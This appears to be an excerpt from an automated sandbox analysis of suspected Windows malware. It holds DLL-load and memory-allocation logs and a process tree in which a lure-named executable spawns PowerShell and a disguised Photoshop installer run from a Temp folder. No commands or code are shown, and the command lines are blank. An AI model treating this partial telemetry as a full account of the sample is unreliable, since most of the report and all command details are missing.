| Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: kernel.appcore.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: uxtheme.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: windows.storage.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wldp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msxml3.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msasn1.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: cryptsp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: rsaenh.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: cryptbase.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: gpapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 5930000 memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 5CD0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 5E50000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 5E70000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 5EE0000 memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 9610000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 9660000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: 96B0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A6D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A730000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A790000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A7B0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A7D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A830000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A890000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A8B0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A8D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: A8F0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: B9A0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: B9D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: B9F0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: BA10000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: BA30000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: BA50000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: BDC0000 memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C3D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C450000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C490000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C4B0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C4D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C530000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: C5D0000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: CA30000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: CF00000 memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: CA40000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: D0A0000 memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: D000000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: D080000 memory commit | memory reserve | memory write watch |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Memory allocated: D9E0000 memory commit | memory reserve | memory write watch |
Edit tour
Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe (PID: 6524 cmdline: 
powershell.exe (PID: 7192 cmdline: 
conhost.exe (PID: 7200 cmdline: 
PhotoshopElements_2024_LS30_win64.exe (PID: 7360 cmdline: 
chrome.exe (PID: 8016 cmdline: 
